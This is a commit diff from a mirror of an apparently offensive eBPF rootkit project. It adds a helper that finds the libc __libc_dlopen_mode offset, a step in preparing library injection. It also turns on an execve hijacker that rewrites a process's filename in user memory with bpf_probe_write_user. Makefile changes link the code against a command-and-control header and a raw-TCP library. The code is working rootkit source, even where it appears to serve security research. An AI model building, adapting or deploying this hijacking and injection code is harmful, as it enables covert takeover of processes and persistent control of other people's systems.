mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-16 23:33:06 +08:00
Added new libc symbols extraction
This commit is contained in:
h3xduck
Binary file not shown.
File diff suppressed because it is too large
Load Diff
@@ -47,7 +47,7 @@ else
|
|||||||
endif
|
endif
|
||||||
|
|
||||||
.PHONY: all
|
.PHONY: all
|
||||||
all: $(APPS)
|
all: $(APPS) tckit
|
||||||
|
|
||||||
.PHONY: clean
|
.PHONY: clean
|
||||||
clean:
|
clean:
|
||||||
@@ -92,12 +92,12 @@ $(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h) | $(OUTPUT)
|
|||||||
#User code
|
#User code
|
||||||
$(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT)
|
$(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT)
|
||||||
$(call msg,CC,$@)
|
$(call msg,CC,$@)
|
||||||
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@
|
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@ -ldl
|
||||||
|
|
||||||
# Build application binary
|
# Build application binary
|
||||||
$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
|
$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
|
||||||
$(call msg,BINARY,$@)
|
$(call msg,BINARY,$@)
|
||||||
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@
|
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@ -ldl
|
||||||
$(Q)rm $(USER_INCLUDES_OBJ)
|
$(Q)rm $(USER_INCLUDES_OBJ)
|
||||||
|
|
||||||
tckit: $(abspath $(EBPF)/include/bpf)/tc.c
|
tckit: $(abspath $(EBPF)/include/bpf)/tc.c
|
||||||
|
|||||||
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
@@ -89,7 +89,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
|||||||
if(hijacker_state == 1){
|
if(hijacker_state == 1){
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
bpf_printk("Starting execve hijacker\n");
|
//bpf_printk("Starting execve hijacker\n");
|
||||||
|
|
||||||
unsigned char* argv[NUMBER_ARGUMENTS_PARSED] = {0};
|
unsigned char* argv[NUMBER_ARGUMENTS_PARSED] = {0};
|
||||||
//unsigned char* envp[PROGRAM_LENGTH] = {0};
|
//unsigned char* envp[PROGRAM_LENGTH] = {0};
|
||||||
@@ -107,13 +107,13 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
|||||||
bpf_printk("Error reading 3\n");
|
bpf_printk("Error reading 3\n");
|
||||||
};
|
};
|
||||||
|
|
||||||
bpf_printk("OLD ARGV0: %s\n", argv[0]);
|
/*bpf_printk("OLD ARGV0: %s\n", argv[0]);
|
||||||
bpf_printk("ARGV1: %s\n", argv[1]);
|
bpf_printk("ARGV1: %s\n", argv[1]);
|
||||||
bpf_printk("ARGV2: %s\n", argv[2]);
|
bpf_printk("ARGV2: %s\n", argv[2]);
|
||||||
//bpf_printk("ENVP: %s\n", envp);
|
//bpf_printk("ENVP: %s\n", envp);
|
||||||
bpf_printk("FILENAME: %s\n", filename);
|
bpf_printk("FILENAME: %s\n", filename);*/
|
||||||
if((void*)ctx->filename==(void*)(ctx->argv)){
|
if((void*)ctx->filename==(void*)(ctx->argv)){
|
||||||
bpf_printk("Equal pointers");
|
//bpf_printk("Equal pointers");
|
||||||
}else{
|
}else{
|
||||||
//bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
|
//bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
|
||||||
}
|
}
|
||||||
@@ -154,10 +154,10 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
|||||||
|
|
||||||
//Provided that the case error 2 may happen, we check if we are on that case before going ahead and overwriting everything.
|
//Provided that the case error 2 may happen, we check if we are on that case before going ahead and overwriting everything.
|
||||||
if(test_write_user_unique(ctx, (char*)filename, (char*)argv[0])!=0){
|
if(test_write_user_unique(ctx, (char*)filename, (char*)argv[0])!=0){
|
||||||
bpf_printk("Test failed\n");
|
//bpf_printk("Test failed\n");
|
||||||
return -1;
|
return -1;
|
||||||
}else{
|
}else{
|
||||||
bpf_printk("Test completed\n");
|
//bpf_printk("Test completed\n");
|
||||||
}
|
}
|
||||||
|
|
||||||
if(bpf_probe_write_user((void*)(ctx->filename), (void*)to_write, (__u32)sizeof(PATH_EXECUTION_HIJACK_PROGRAM))<0){
|
if(bpf_probe_write_user((void*)(ctx->filename), (void*)to_write, (__u32)sizeof(PATH_EXECUTION_HIJACK_PROGRAM))<0){
|
||||||
@@ -168,7 +168,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
|||||||
return -1;
|
return -1;
|
||||||
}
|
}
|
||||||
|
|
||||||
//hijacker_state = 1;
|
hijacker_state = 1;
|
||||||
|
|
||||||
unsigned char newfilename[ARGUMENT_LENGTH] = {0};
|
unsigned char newfilename[ARGUMENT_LENGTH] = {0};
|
||||||
unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
|
unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
|
||||||
@@ -179,10 +179,10 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
|||||||
bpf_printk("Error reading 1\n");
|
bpf_printk("Error reading 1\n");
|
||||||
};
|
};
|
||||||
|
|
||||||
bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
|
/*bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
|
||||||
bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
|
bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
|
||||||
bpf_printk("NEW ARGV1: %s\n", newargv[1]);
|
bpf_printk("NEW ARGV1: %s\n", newargv[1]);
|
||||||
bpf_printk("NEW ARGV2: %s\n", newargv[2]);
|
bpf_printk("NEW ARGV2: %s\n", newargv[2]);*/
|
||||||
//bpf_printk("ORIGINAL %s\n\n", filename);
|
//bpf_printk("ORIGINAL %s\n\n", filename);
|
||||||
|
|
||||||
return 0;
|
return 0;
|
||||||
|
|||||||
@@ -3,14 +3,22 @@ HEADERS = lib/RawTCP.h
|
|||||||
EXTRA_CFLAGS= -I$(PWD)/lib
|
EXTRA_CFLAGS= -I$(PWD)/lib
|
||||||
|
|
||||||
default:
|
default:
|
||||||
make execve_hijack
|
make execve_hijack injection_ex
|
||||||
|
|
||||||
|
injection_ex.o: injection_ex.c
|
||||||
|
clang -g -Wall -c injection_ex.c
|
||||||
|
|
||||||
|
injection_ex: injection_ex.o
|
||||||
|
clang -g -Wall -o injection_ex injection_ex.o -ldl
|
||||||
|
|
||||||
execve_hijack.o: execve_hijack.c $(HEADERS)
|
execve_hijack.o: execve_hijack.c $(HEADERS)
|
||||||
gcc -c execve_hijack.c
|
clang -c execve_hijack.c
|
||||||
|
|
||||||
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
|
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
|
||||||
gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a
|
clang -lm -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
|
||||||
|
|
||||||
clean:
|
clean:
|
||||||
-rm -f execve_hijack.o
|
-rm -f execve_hijack.o
|
||||||
-rm -f execve_hijack
|
-rm -f execve_hijack
|
||||||
|
-rm -f injection_ex.o
|
||||||
|
-rm -f injection_ex
|
||||||
Binary file not shown.
@@ -15,12 +15,14 @@
|
|||||||
#include <netdb.h>
|
#include <netdb.h>
|
||||||
#include <netinet/ip.h>
|
#include <netinet/ip.h>
|
||||||
#include <netinet/tcp.h>
|
#include <netinet/tcp.h>
|
||||||
|
#include <dlfcn.h>
|
||||||
|
|
||||||
#include "lib/RawTCP.h"
|
#include "lib/RawTCP.h"
|
||||||
#include "../common/c&c.h"
|
#include "../common/c&c.h"
|
||||||
|
|
||||||
|
|
||||||
char* execute_command(char* command){
|
char* execute_command(char* command){
|
||||||
|
|
||||||
FILE *fp;
|
FILE *fp;
|
||||||
char* res = calloc(4096, sizeof(char));
|
char* res = calloc(4096, sizeof(char));
|
||||||
char buf[1024];
|
char buf[1024];
|
||||||
@@ -70,7 +72,6 @@ int main(int argc, char* argv[], char *envp[]){
|
|||||||
printf("Argument %i is %s\n", ii, argv[ii]);
|
printf("Argument %i is %s\n", ii, argv[ii]);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
time_t rawtime;
|
time_t rawtime;
|
||||||
struct tm * timeinfo;
|
struct tm * timeinfo;
|
||||||
|
|
||||||
|
|||||||
Binary file not shown.
BIN
src/helpers/injection_ex
Executable file
BIN
src/helpers/injection_ex
Executable file
Binary file not shown.
23
src/helpers/injection_ex.c
Normal file
23
src/helpers/injection_ex.c
Normal file
@@ -0,0 +1,23 @@
|
|||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <dlfcn.h>
|
||||||
|
#include <link.h>
|
||||||
|
|
||||||
|
int main(){
|
||||||
|
struct link_map *lm;
|
||||||
|
off_t offset = 0;
|
||||||
|
unsigned long long dlopenAddr;
|
||||||
|
lm = dlopen("libc.so.6", RTLD_LAZY);
|
||||||
|
if(lm==0){
|
||||||
|
perror("Error obtaining libc symbols");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
|
||||||
|
printf("libdl: %lx\n", lm->l_addr);
|
||||||
|
printf("dlopen: %llx\n", dlopenAddr);
|
||||||
|
offset = dlopenAddr - lm->l_addr;
|
||||||
|
printf("Offset: %lx\n", offset);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
BIN
src/helpers/injection_ex.o
Normal file
BIN
src/helpers/injection_ex.o
Normal file
Binary file not shown.
@@ -7,6 +7,8 @@
|
|||||||
#include <linux/if_link.h>
|
#include <linux/if_link.h>
|
||||||
#include <net/if.h>
|
#include <net/if.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
|
#include <dlfcn.h>
|
||||||
|
#include <link.h>
|
||||||
|
|
||||||
#include <bpf/bpf.h>
|
#include <bpf/bpf.h>
|
||||||
|
|
||||||
@@ -209,6 +211,20 @@ int main(int argc, char**argv){
|
|||||||
goto cleanup;
|
goto cleanup;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
struct link_map *lm;
|
||||||
|
off_t offset = 0;
|
||||||
|
unsigned long long dlopenAddr;
|
||||||
|
lm = dlopen("libc.so.6", RTLD_LAZY);
|
||||||
|
if(lm==0){
|
||||||
|
perror("Error obtaining libc symbols");
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
dlopenAddr = (unsigned long long)dlsym((void*)lm, "__libc_dlopen_mode");
|
||||||
|
printf("libdl: %lx\n", lm->l_addr);
|
||||||
|
printf("dlopen: %llx\n", dlopenAddr);
|
||||||
|
offset = dlopenAddr - lm->l_addr;
|
||||||
|
printf("Offset: %lx\n", offset);
|
||||||
|
|
||||||
//Now wait for messages from ebpf program
|
//Now wait for messages from ebpf program
|
||||||
printf("Filter set and ready\n");
|
printf("Filter set and ready\n");
|
||||||
while (!exiting) {
|
while (!exiting) {
|
||||||
|
|||||||
Reference in New Issue
Block a user